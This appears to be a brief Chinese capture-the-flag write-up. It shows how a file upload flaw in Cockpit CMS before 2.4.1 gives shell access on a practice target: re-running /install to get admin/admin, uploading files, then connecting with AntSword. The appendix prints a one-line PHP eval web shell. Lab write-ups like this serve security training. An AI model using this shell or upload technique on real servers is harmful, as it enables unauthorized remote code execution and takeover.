简介
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装
正文
来到靶场,首先进行弱口令爆破,发现没用,那么只好老老实实的看靶场提示
先来访问/install
访问后就可以进行登录了,提示我们账号密码是admin/admin
来到后台
进入上传界面
然后开始进行文件上传
上传成功后点击这个3个小点点,然后右键点击download,从新窗口打开,然后我们就发现我们的phpinfo函数已经上传成功了,那么我们就直接开始上传一句话木马啦!
上蚁剑
蚁剑连接成功
拿下
找到flag拿下拿下
附录
我上传的1.php是<?php phpinfo();?>
上传的shell.php是<?php @eval($_POST["huahua"]);?>
最后
嘿嘿,又拿下一血啦!!!!!
